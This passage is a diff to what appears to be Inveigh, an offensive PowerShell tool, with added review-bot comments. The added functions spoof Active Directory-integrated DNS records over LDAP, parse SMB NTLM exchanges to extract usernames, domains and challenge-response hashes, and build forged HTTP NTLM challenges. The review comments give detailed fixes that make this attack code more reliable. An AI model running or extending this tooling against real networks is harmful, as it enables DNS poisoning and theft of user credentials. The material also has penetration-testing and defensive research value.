+ [parameter(Mandatory=$false)][String]$Zone,
+ [parameter(Mandatory=$false)][Int]$TTL,
+ [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential
+ )
+
+ $null = [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols")
+
+ $distinguished_name = "DC=$Node,DC=$Zone,CN=MicrosoftDNS,DC=$Partition"
+ $DC_array = $Domain.Split(".")
+
+ ForEach($DC in $DC_array)
+ {
+ $distinguished_name += ",DC=$DC"
+ }
- $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNSName -DNSData $DNSData -DNSTTL $DNSTTL
+ [Byte[]]$DNSRecord = New-DNSRecordArray -Data $Data -DomainController $DomainController -TTL $TTL -Zone $Zone
+ $identifier = New-Object System.DirectoryServices.Protocols.LdapDirectoryIdentifier($DomainController,389)
- if($DNS_update -eq "[+] DNS update successful")
+ if($Credential)
+ {
+ $connection = New-Object System.DirectoryServices.Protocols.LdapConnection($identifier,$Credential.GetNetworkCredential())
+ }
+ else
{
- $inveigh.DNS_list.Add("1," + $_.Name) > $null
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] DNS host (A) record for " + $_.Name + " added") > $null
+ $connection = New-Object System.DirectoryServices.Protocols.LdapConnection($identifier)
}
- elseif($DNS_update -eq "[-] Kerberos preauthentication error 0x06")
+
+ $object_category = "CN=Dns-Node,CN=Schema,CN=Configuration"
+
+ $DC_array = $Domain.Split(".")
+
+ ForEach($DC in $DC_array)
+ {
+ $object_category += ",DC=$DC"
+ }
+
+ try
{
- $inveigh.DNS = $false
- $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Disabling DNS injection due to auth failure") > $null
+ $connection.SessionOptions.Sealing = $true
+ $connection.SessionOptions.Signing = $true
+ $connection.Bind()
+ $request = New-Object -TypeName System.DirectoryServices.Protocols.AddRequest
+ $request.DistinguishedName = $distinguished_name
+ $request.Attributes.Add((New-Object "System.DirectoryServices.Protocols.DirectoryAttribute" -ArgumentList "objectClass",@("top","dnsNode"))) > $null
+ $request.Attributes.Add((New-Object "System.DirectoryServices.Protocols.DirectoryAttribute" -ArgumentList "objectCategory",$object_category)) > $null
+ $request.Attributes.Add((New-Object "System.DirectoryServices.Protocols.DirectoryAttribute" -ArgumentList "dnsRecord",$DNSRecord)) > $null
+ $request.Attributes.Add((New-Object "System.DirectoryServices.Protocols.DirectoryAttribute" -ArgumentList "dNSTombstoned","TRUE")) > $null
+ $connection.SendRequest($request) > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] ADIDNS node $Node added") > $null
+ $output = $true
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+ $inveigh.DNS_table.$Node = "1"
+ }
+
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $output = $false
+
+ if($_.Exception.Message -ne 'Exception calling "SendRequest" with "1" argument(s): "The object exists."')
+ {
+ $inveigh.ADIDNS = $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ }
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+ $inveigh.DNS_table.$Node = "0"
+ }
+
+ }
+
+ return $output
+ }
+
+ function New-SOASerialNumberArray
+ {
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$false)][String]$Zone
+ )
+
+ $Zone = $Zone.ToLower()
+
+ function Convert-DataToUInt16($Field)
+ {
+ [Array]::Reverse($Field)
+ return [System.BitConverter]::ToUInt16($Field,0)
+ }
+
+ function ConvertFrom-PacketOrderedDictionary($OrderedDictionary)
+ {
+
+ ForEach($field in $OrderedDictionary.Values)
+ {
+ $byte_array += $field
+ }
+
+ return $byte_array
+ }
+
+ function New-RandomByteArray
+ {
+ param([Int]$Length,[Int]$Minimum=1,[Int]$Maximum=255)
+
+ [String]$random = [String](1..$Length | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum $Minimum -Maximum $Maximum)})
+ [Byte[]]$random = $random.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ return $random
+ }
+
+ function New-DNSNameArray
+ {
+ param([String]$Name)
+
+ $character_array = $Name.ToCharArray()
+ [Array]$index_array = 0..($character_array.Count - 1) | Where-Object {$character_array[$_] -eq '.'}
+
+ if($index_array.Count -gt 0)
+ {
+
+ $name_start = 0
+
+ ForEach ($index in $index_array)
+ {
+ $name_end = $index - $name_start
+ [Byte[]]$name_array += $name_end
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start,$name_end))
+ $name_start = $index + 1
+ }
+
+ [Byte[]]$name_array += ($Name.Length - $name_start)
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start))
+ }
+ else
+ {
+ [Byte[]]$name_array = $Name.Length
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start))
+ }
+
+ return $name_array
+ }
+
+ function New-PacketDNSSOAQuery
+ {
+ param([String]$Name)
+
+ [Byte[]]$type = 0x00,0x06
+ [Byte[]]$name = (New-DNSNameArray $Name) + 0x00
+ [Byte[]]$length = [System.BitConverter]::GetBytes($Name.Count + 16)[1,0]
+ [Byte[]]$transaction_ID = New-RandomByteArray 2
+ $DNSQuery = New-Object System.Collections.Specialized.OrderedDictionary
+ $DNSQuery.Add("Length",$length)
+ $DNSQuery.Add("TransactionID",$transaction_ID)
+ $DNSQuery.Add("Flags",[Byte[]](0x01,0x00))
+ $DNSQuery.Add("Questions",[Byte[]](0x00,0x01))
+ $DNSQuery.Add("AnswerRRs",[Byte[]](0x00,0x00))
+ $DNSQuery.Add("AuthorityRRs",[Byte[]](0x00,0x00))
+ $DNSQuery.Add("AdditionalRRs",[Byte[]](0x00,0x00))
+ $DNSQuery.Add("Queries_Name",$name)
+ $DNSQuery.Add("Queries_Type",$type)
+ $DNSQuery.Add("Queries_Class",[Byte[]](0x00,0x01))
+
+ return $DNSQuery
+ }
+
+ $DNS_client = New-Object System.Net.Sockets.TCPClient
+ $DNS_client.Client.ReceiveTimeout = 3000
+
+ try
+ {
+ $DNS_client.Connect($DomainController,"53")
+ $DNS_client_stream = $DNS_client.GetStream()
+ $DNS_client_receive = New-Object System.Byte[] 2048
+ $packet_DNSQuery = New-PacketDNSSOAQuery $Zone
+ [Byte[]]$DNS_client_send = ConvertFrom-PacketOrderedDictionary $packet_DNSQuery
+ $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null
+ $DNS_client_stream.Flush()
+ $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null
+ $DNS_client.Close()
+ $DNS_client_stream.Close()
+
+ if($DNS_client_receive[9] -eq 0)
+ {
+ $inveigh.output_queue.Add("[-] $Zone SOA record not found") > $null
+ }
+ else
+ {
+ $DNS_reply_converted = [System.BitConverter]::ToString($DNS_client_receive)
+ $DNS_reply_converted = $DNS_reply_converted -replace "-",""
+ $SOA_answer_index = $DNS_reply_converted.IndexOf("C00C00060001")
+ $SOA_answer_index = $SOA_answer_index / 2
+ $SOA_length = $DNS_client_receive[($SOA_answer_index + 10)..($SOA_answer_index + 11)]
+ $SOA_length = Convert-DataToUInt16 $SOA_length
+ [Byte[]]$SOA_serial_current_array = $DNS_client_receive[($SOA_answer_index + $SOA_length - 8)..($SOA_answer_index + $SOA_length - 5)]
+ $SOA_serial_current = [System.BitConverter]::ToUInt32($SOA_serial_current_array[3..0],0) + 1
+ [Byte[]]$SOA_serial_number_array = [System.BitConverter]::GetBytes($SOA_serial_current)[0..3]
+ }
+
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] $DomainController did not respond on TCP port 53") > $null
+ }
+
+ return [Byte[]]$SOA_serial_number_array
+ }
+
+ function New-DNSRecordArray
+ {
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$Data,
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$false)][ValidateSet("A","AAAA","CNAME","DNAME","MX","NS","PTR","SRV","TXT")][String]$Type = "A",
+ [parameter(Mandatory=$false)][String]$Zone,
+ [parameter(Mandatory=$false)][Int]$Preference,
+ [parameter(Mandatory=$false)][Int]$Priority,
+ [parameter(Mandatory=$false)][Int]$Weight,
+ [parameter(Mandatory=$false)][Int]$Port,
+ [parameter(Mandatory=$false)][Int]$TTL
+ )
+
+ $SOASerialNumberArray = New-SOASerialNumberArray -DomainController $DomainController -Zone $Zone
+
+ function New-DNSNameArray
+ {
+ param([String]$Name)
+
+ $character_array = $Name.ToCharArray()
+ [Array]$index_array = 0..($character_array.Count - 1) | Where-Object {$character_array[$_] -eq '.'}
+
+ if($index_array.Count -gt 0)
+ {
+
+ $name_start = 0
+
+ ForEach ($index in $index_array)
+ {
+ $name_end = $index - $name_start
+ [Byte[]]$name_array += $name_end
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start,$name_end))
+ $name_start = $index + 1
+ }
+
+ [Byte[]]$name_array += ($Name.Length - $name_start)
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start))
+ }
+ else
+ {
+ [Byte[]]$name_array = $Name.Length
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start))
+ }
+
+ return $name_array
+ }
+
+ switch ($Type)
+ {
+
+ 'A'
+ {
+ [Byte[]]$DNS_type = 0x01,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes(($Data.Split(".")).Count))[0..1]
+ [Byte[]]$DNS_data += ([System.Net.IPAddress][String]([System.Net.IPAddress]$Data)).GetAddressBytes()
+ }
+
+ 'AAAA'
+ {
+ [Byte[]]$DNS_type = 0x1c,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes(($Data -replace ":","").Length / 2))[0..1]
+ [Byte[]]$DNS_data += ([System.Net.IPAddress][String]([System.Net.IPAddress]$Data)).GetAddressBytes()
+ }
+
+ 'CNAME'
+ {
+ [Byte[]]$DNS_type = 0x05,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 4))[0..1]
+ [Byte[]]$DNS_data = $Data.Length + 2
+ $DNS_data += ($Data.Split(".")).Count
+ $DNS_data += New-DNSNameArray $Data
+ $DNS_data += 0x00
+ }
+
+ 'DNAME'
+ {
+ [Byte[]]$DNS_type = 0x27,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 4))[0..1]
+ [Byte[]]$DNS_data = $Data.Length + 2
+ $DNS_data += ($Data.Split(".")).Count
+ $DNS_data += New-DNSNameArray $Data
+ $DNS_data += 0x00
+ }
+
+ 'MX'
+ {
+ [Byte[]]$DNS_type = 0x0f,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 6))[0..1]
+ [Byte[]]$DNS_data = [System.Bitconverter]::GetBytes($Preference)[1,0]
+ $DNS_data += $Data.Length + 2
+ $DNS_data += ($Data.Split(".")).Count
+ $DNS_data += New-DNSNameArray $Data
+ $DNS_data += 0x00
+ }
+
+ 'NS'
+ {
+ [Byte[]]$DNS_type = 0x02,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 4))[0..1]
+ [Byte[]]$DNS_data = $Data.Length + 2
+ $DNS_data += ($Data.Split(".")).Count
+ $DNS_data += New-DNSNameArray $Data
+ $DNS_data += 0x00
+ }
+
+ 'PTR'
+ {
+ [Byte[]]$DNS_type = 0x0c,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 4))[0..1]
+ [Byte[]]$DNS_data = $Data.Length + 2
+ $DNS_data += ($Data.Split(".")).Count
+ $DNS_data += New-DNSNameArray $Data
+ $DNS_data += 0x00
+ }
+
+ 'SRV'
+ {
+ [Byte[]]$DNS_type = 0x21,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 10))[0..1]
+ [Byte[]]$DNS_data = [System.Bitconverter]::GetBytes($Priority)[1,0]
+ $DNS_data += [System.Bitconverter]::GetBytes($Weight)[1,0]
+ $DNS_data += [System.Bitconverter]::GetBytes($Port)[1,0]
+ $DNS_data += $Data.Length + 2
+ $DNS_data += ($Data.Split(".")).Count
+ $DNS_data += New-DNSNameArray $Data
+ $DNS_data += 0x00
+ }
+
+ 'TXT'
+ {
+ [Byte[]]$DNS_type = 0x10,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 1))[0..1]
+ [Byte[]]$DNS_data = $Data.Length
+ $DNS_data += [System.Text.Encoding]::UTF8.GetBytes($Data)
+ }
+
+ }
+
+ [Byte[]]$DNS_TTL = [System.BitConverter]::GetBytes($TTL)
+ [Byte[]]$DNS_record = $DNS_length +
+ $DNS_type +
+ 0x05,0xF0,0x00,0x00 +
+ $SOASerialNumberArray[0..3] +
+ $DNS_TTL[3..0] +
+ 0x00,0x00,0x00,0x00
+
+ if($Static)
+ {
+ $DNS_record += 0x00,0x00,0x00,0x00
}
else
{
- $inveigh.DNS_list.Add("0," + $_.Name) > $null
- $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS host (A) record for " + $_.Name + " add failed") > $null
+ $timestamp = [Int64](([Datetime]::UtcNow)-(Get-Date "1/1/1601")).TotalHours
+ $timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($timestamp))
+ $timestamp = $timestamp.Split("-") | ForEach-Object{[System.Convert]::ToInt16($_,16)}
+ $timestamp = $timestamp[0..3]
+ $DNS_record += $timestamp
}
+
+ $DNS_record += $DNS_data
+ return [Byte[]]$DNS_record
}
- function DNSCheck
+ function Invoke-ADIDNSSpoofer
{
- param ([String]$DNSData,[Array]$DNSHostsIgnore,[Int]$DNSThreshold,[Int]$DNSTTL)
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$Data,
+ [parameter(Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$true)][String]$Node,
+ [parameter(Mandatory=$false)]$Partition,
+ [parameter(Mandatory=$false)][String]$Zone,
+ [parameter(Mandatory=$false)][Int]$TTL,
+ [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential
+ )
- $inveigh.requested_host_list | Group-Object | ForEach-Object {
-
- if($_.Count -gt $DNSThreshold)
+ try
+ {
+ $node_added = New-ADIDNSNode -Credential $Credential -Data $Data -Domain $Domain -DomainController $DomainController -Node $Node -Partition $Partition -TTL $TTL -Zone $Zone
+
+ if($inveigh.ADIDNS -and !$node_added)
+ {
+ $node_tombstoned = Get-ADIDNSNodeTombstoned -Credential $Credential -Domain $Domain -DomainController $DomainController -Node $Node -Partition $Partition -Zone $Zone
+
+ if($node_tombstoned)
+ {
+ Enable-ADIDNSNode -Credential $Credential -Data $Data -Domain $Domain -DomainController $DomainController -Node $Node -Partition $Partition -TTL $TTL -Zone $Zone
+ }
+
+ }
+
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] ADIDNS spoofer disabled due to error") > $null
+ $inveigh.ADIDNS = $null
+ }
+
+ }
+
+ function Invoke-ADIDNSCheck
+ {
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][Array]$Ignore,
+ [parameter(Mandatory=$false)][String]$Data,
+ [parameter(Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$false)]$Partition,
+ [parameter(Mandatory=$false)][String]$Zone,
+ [parameter(Mandatory=$false)][Int]$Threshold,
+ [parameter(Mandatory=$false)][Int]$TTL,
+ [parameter(Mandatory=$false)]$RequestTable,
+ [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential
+ )
+
+ Start-Sleep -S 1
+
+ ForEach($request in $RequestTable.Keys)
+ {
+
+ if($RequestTable.$request.Count -gt $Threshold)
{
+
+ if(!$inveigh.DNS_table.ContainsKey($request))
+ {
+ $inveigh.DNS_table.Add($request,"")
+ }
- if($DNSHostsIgnore -NotContains $_.Name -and $inveigh.DNS_list -NotContains "0,$($_.Name)" -and $inveigh.DNS_list -NotContains "1,$($_.Name)")
+ if($Ignore -NotContains $request -and $inveigh.DNS_table.$request -ne 0 -and $inveigh.DNS_table.$request -ne 1)
{
- DNSUpdate $_.Name $DNSData $DNSTTL
+ Invoke-ADIDNSSpoofer -Credential $Credential -Data $Data -Domain $Domain -DomainController $DomainController -Node $request -Partition $Partition -TTL $TTL -Zone $Zone
}
- elseif($DNSHostsIgnore -Contains $_.Name)
+ elseif($Ignore -Contains $request)
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] Ignored $($_.Name) for DNS injection")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] ADIDNS spoofer ignored $request")
}
}
-
+
+ Start-Sleep -m 10
}
}
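Review bot: Two of the new helpers read variables that are never assigned: New-RelayEnumObject adds the "Enumerate" and "Execute" members from `$Enumeration` and `$Execution` although its parameters are `$Enumerate` and `$Execute` (so both properties are always null), and the hostname branch of Invoke-SessionUpdate tests `$session_entry -like "$domain\*"`, which is unset, so the domain-mapping rewrite of existing sessions never fires there while the IP branch correctly uses `$session_list[$i]`. The fixes are `-Name "Enumerate" $Enumerate`, `-Name "Execute" $Execute` and `if($session_list[$i] -like "$domain\*")`; note also that Invoke-SessionUpdate's else branch never sets `$hostname_full`, so the later hostname lookup compares against $null. New-SOASerialNumberArray returns $null when the DC does not answer on TCP/53 or the SOA answer is not found (the `IndexOf("C00C00060001")` result is also never checked for -1), yet New-DNSRecordArray still splices `$SOASerialNumberArray[0..3]` into the record, so a failed lookup writes a dnsRecord with four bytes missing instead of aborting; a `if(!$SOASerialNumberArray){ return }` before the record is assembled, with callers treating a null record as failure, would avoid pushing a malformed node. The `$_.Exception.Message -ne '... "The object exists."'` test in New-ADIDNSNode (and the similar message match in Get-ADIDNSNodeTombstoned) depends on locale and runtime wording; the DirectoryOperationException's `Response.ResultCode` (EntryAlreadyExists), presumably reachable via `$_.Exception.InnerException` given PowerShell's method-invocation wrapping, is the stable signal. New-DNSRecordArray additionally reads `$Static` without declaring it as a parameter, so the static-record branch can only be reached through an inherited variable.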
@@ -1536,54 +2394,137 @@ $DNS_functions_scriptblock =
# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response
$SMB_NTLM_functions_scriptblock =
{
-
- function SMBNTLMChallenge
+
+ function Get-SMBConnection
{
- param ([Byte[]]$payload_bytes)
+ param ([Byte[]]$Payload,[String]$Session,[String]$Port)
- $payload = [System.BitConverter]::ToString($payload_bytes)
- $payload = $payload -replace "-",""
- $NTLM_index = $payload.IndexOf("4E544C4D53535000")
+ $payload_converted = [System.BitConverter]::ToString($Payload)
+ $payload_converted = $payload_converted -replace "-",""
+ $SMB_index = $payload_converted.IndexOf("FF534D42")
- if($NTLM_index -gt 0 -and $payload.SubString(($NTLM_index + 16),8) -eq "02000000")
+ if(!$inveigh.SMB_session_table.ContainsKey($Session) -and $SMB_index -gt 0 -and $payload_converted.SubString(($SMB_index + 8),2) -eq "72")
{
- $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16)
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB($Port) negotiation request detected from $Session") > $null
+ }
+
+ if(!$inveigh.SMB_session_table.ContainsKey($Session) -and $SMB_index -gt 0)
+ {
+ $inveigh.SMB_session_table.Add($Session,"")
+ }
+
+ $SMB_index = $payload_converted.IndexOf("FE534D42")
+
+ if(!$inveigh.SMB_session_table.ContainsKey($Session) -and $SMB_index -gt 0 -and $payload_converted.SubString(($SMB_index + 24),4) -eq "0000")
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB($Port) negotiation request detected from $Session") > $null
+ }
+
+ if(!$inveigh.SMB_session_table.ContainsKey($Session) -and $SMB_index -gt 0)
+ {
+ $inveigh.SMB_session_table.Add($Session,"")
}
- return $NTLM_challenge
}
- function SMBNTLMResponse
+ function Get-SMBNTLMChallenge
{
- param ([Byte[]]$payload_bytes)
+ param ([Byte[]]$Payload)
- $payload = [System.BitConverter]::ToString($payload_bytes)
- $payload = $payload -replace "-",""
- $NTLMSSP_hex_offset = $payload.IndexOf("4E544C4D53535000")
+ $payload_converted = [System.BitConverter]::ToString($Payload)
+ $payload_converted = $payload_converted -replace "-",""
+ $NTLM_index = $payload_converted.IndexOf("4E544C4D53535000")
- if($NTLMSSP_hex_offset -gt 0 -and $payload.SubString(($NTLMSSP_hex_offset + 16),8) -eq "03000000")
+ if($payload_converted.SubString(($NTLM_index + 16),8) -eq "02000000")
{
- $NTLMSSP_offset = $NTLMSSP_hex_offset / 2
+ $NTLM_challenge = $payload_converted.SubString(($NTLM_index + 48),16)
+ }
- $LM_length = DataLength2 ($NTLMSSP_offset + 12) $payload_bytes
- $LM_offset = DataLength4 ($NTLMSSP_offset + 16) $payload_bytes
- $LM_response = [System.BitConverter]::ToString($payload_bytes[($NTLMSSP_offset + $LM_offset)..($NTLMSSP_offset + $LM_offset + $LM_length - 1)]) -replace "-",""
+ $target_name_length = Get-UInt16DataLength (($NTLM_index + 24) / 2) $Payload
+ $negotiate_flags = [System.Convert]::ToInt16(($payload_converted.SubString(($NTLM_index + 44),2)),16)
+ $negotiate_flags = [Convert]::ToString($negotiate_flags,2)
+ $target_info_flag = $negotiate_flags.SubString(0,1)
- $NTLM_length = DataLength2 ($NTLMSSP_offset + 20) $payload_bytes
- $NTLM_offset = DataLength4 ($NTLMSSP_offset + 24) $payload_bytes
- $NTLM_response = [System.BitConverter]::ToString($payload_bytes[($NTLMSSP_offset + $NTLM_offset)..($NTLMSSP_offset + $NTLM_offset + $NTLM_length - 1)]) -replace "-",""
+ if($target_info_flag -eq 1)
+ {
+ $target_info_index = ($NTLM_index + 80) / 2
+ $target_info_index = $target_info_index + $target_name_length + 16
+ $target_info_item_type = $Payload[$target_info_index]
+ $i = 0
- $domain_length = DataLength2 ($NTLMSSP_offset + 28) $payload_bytes
- $domain_offset = DataLength4 ($NTLMSSP_offset + 32) $payload_bytes
- $NTLM_domain_string = DataToString ($NTLMSSP_offset + $domain_offset) $domain_length $payload_bytes
+ while($target_info_item_type -ne 0 -and $i -lt 10)
+ {
+ $target_info_item_length = Get-UInt16DataLength ($target_info_index + 2) $Payload
- $user_length = DataLength2 ($NTLMSSP_offset + 36) $payload_bytes
- $user_offset = DataLength4 ($NTLMSSP_offset + 40) $payload_bytes
- $NTLM_user_string = DataToString ($NTLMSSP_offset + $user_offset) $user_length $payload_bytes
+ switch($target_info_item_type)
+ {
- $host_length = DataLength2 ($NTLMSSP_offset + 44) $payload_bytes
- $host_offset = DataLength4 ($NTLMSSP_offset + 48) $payload_bytes
- $NTLM_host_string = DataToString ($NTLMSSP_offset + $host_offset) $host_length $payload_bytes
+ 2
+ {
+ $netBIOS_domain_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $Payload
+ }
+
+ 3
+ {
+ $DNS_computer_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $Payload
+ }
+
+ 4
+ {
+ $DNS_domain_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $Payload
+ }
+
+ }
+
+ $target_info_index = $target_info_index + $target_info_item_length + 4
+ $target_info_item_type = $Payload[$target_info_index]
+ $i++
+ }
+
+ if($netBIOS_domain_name -and $DNS_domain_name -and !$inveigh.domain_mapping_table.$netBIOS_domain_name -and $netBIOS_domain_name -ne $DNS_domain_name)
+ {
+ $inveigh.domain_mapping_table.Add($netBIOS_domain_name,$DNS_domain_name)
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] Domain mapping added for $netBIOS_domain_name to $DNS_domain_name") > $null
+ }
+
+ if($inveigh.enumeration_data | Where-Object {$_.IP -eq $target -and !$_.Hostname})
+ {
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
+ $inveigh.enumeration_data[$target_index].Hostname = $DNS_computer_name
+ }
+
+ }
+
+ return $NTLM_challenge
+ }
+
+ function Get-SMBNTLMResponse
+ {
+ param ([Byte[]]$Payload,[String]$Session)
+
+ $payload_converted = [System.BitConverter]::ToString($Payload)
+ $payload_converted = $payload_converted -replace "-",""
+ $NTLMSSP_hex_offset = $payload_converted.IndexOf("4E544C4D53535000")
+
+ if($NTLMSSP_hex_offset -gt 0 -and $payload_converted.SubString(($NTLMSSP_hex_offset + 16),8) -eq "03000000")
+ {
+ $NTLMSSP_offset = $NTLMSSP_hex_offset / 2
+ $LM_length = Get-UInt16DataLength ($NTLMSSP_offset + 12) $Payload
+ $LM_offset = Get-UInt32DataLength ($NTLMSSP_offset + 16) $Payload
+ $LM_response = [System.BitConverter]::ToString($Payload[($NTLMSSP_offset + $LM_offset)..($NTLMSSP_offset + $LM_offset + $LM_length - 1)]) -replace "-",""
+ $NTLM_length = Get-UInt16DataLength ($NTLMSSP_offset + 20) $Payload
+ $NTLM_offset = Get-UInt32DataLength ($NTLMSSP_offset + 24) $Payload
+ $NTLM_response = [System.BitConverter]::ToString($Payload[($NTLMSSP_offset + $NTLM_offset)..($NTLMSSP_offset + $NTLM_offset + $NTLM_length - 1)]) -replace "-",""
+ $domain_length = Get-UInt16DataLength ($NTLMSSP_offset + 28) $Payload
+ $domain_offset = Get-UInt32DataLength ($NTLMSSP_offset + 32) $Payload
+ $NTLM_domain_string = Convert-DataToString ($NTLMSSP_offset + $domain_offset) $domain_length $Payload
+ $user_length = Get-UInt16DataLength ($NTLMSSP_offset + 36) $Payload
+ $user_offset = Get-UInt32DataLength ($NTLMSSP_offset + 40) $Payload
+ $NTLM_user_string = Convert-DataToString ($NTLMSSP_offset + $user_offset) $user_length $Payload
+ $host_length = Get-UInt16DataLength ($NTLMSSP_offset + 44) $Payload
+ $host_offset = Get-UInt32DataLength ($NTLMSSP_offset + 48) $Payload
+ $NTLM_host_string = Convert-DataToString ($NTLMSSP_offset + $host_offset) $host_length $Payload
+ $NTLM_challenge = $inveigh.SMB_session_table.$Session
if($NTLM_length -gt 24)
{
@@ -1659,6 +2600,7 @@ $SMB_NTLM_functions_scriptblock =
}
+ Invoke-SessionUpdate $NTLM_domain_string $NTLM_user_string $NTLM_host_string $source_IP
}
}
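Review bot: The added `Invoke-SessionUpdate` call at L3414 passes `$source_IP`, which is not in Get-SMBNTLMResponse's parameter list (`param ([Byte[]]$Payload,[String]$Session)`), so it is resolved through PowerShell's dynamic scoping from the sniffer scriptblock's variable of that name. Since `$Session` is built as `"$source_IP`:$source_port"`, the function can derive it locally, `$session_IP = $Session.Substring(0, $Session.LastIndexOf(':'))`, and pass `$session_IP`, or take an explicit `$SourceIP` parameter. This path also lacks the null guard the HTTP counterpart applies at L3519 before its own Invoke-SessionUpdate. Invoke-SessionUpdate must additionally be loaded into the sniffer runspace, which only gets the shared basic and SMB NTLM function scriptblocks (L4112-L4114) — verify it is defined in one of those. The enclosing function begins outside this hunk.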
@@ -1693,8 +2635,6 @@ $HTTP_scriptblock =
$HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
}
- $inveigh.HTTP_challenge_queue.Add($ClientIPAddress + $ClientPort + ',' + $HTTP_challenge) > $null
-
if($NTLMESS)
{
$HTTP_NTLM_negotiation_flags = 0x05,0x82,0x89,0x0a
@@ -1704,19 +2644,46 @@ $HTTP_scriptblock =
$HTTP_NTLM_negotiation_flags = 0x05,0x82,0x81,0x0a
}
- $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
- 0x00,0x00,0x00 +
+ $inveigh.HTTP_challenge_queue.Add($ClientIPAddress + $ClientPort + ',' + $HTTP_challenge) > $null
+ $hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.computer_name)
+ $netBIOS_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.netBIOS_domain)
+ $DNS_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.DNS_domain)
+ $DNS_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.DNS_computer_name)
+ $hostname_length = [System.BitConverter]::GetBytes($hostname_bytes.Length)[0,1]
+ $netBIOS_domain_length = [System.BitConverter]::GetBytes($netBIOS_domain_bytes.Length)[0,1]
+ $DNS_domain_length = [System.BitConverter]::GetBytes($DNS_domain_bytes.Length)[0,1]
+ $DNS_hostname_length = [System.BitConverter]::GetBytes($DNS_hostname_bytes.Length)[0,1]
+ $target_length = [System.BitConverter]::GetBytes($hostname_bytes.Length + $netBIOS_domain_bytes.Length + $DNS_domain_bytes.Length + $DNS_domain_bytes.Length + $DNS_hostname_bytes.Length + 36)[0,1]
+ $target_offset = [System.BitConverter]::GetBytes($netBIOS_domain_bytes.Length + 56)
+
+ $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
+ $netBIOS_domain_length +
+ $netBIOS_domain_length +
+ 0x38,0x00,0x00,0x00 +
$HTTP_NTLM_negotiation_flags +
$HTTP_challenge_bytes +
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
- 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
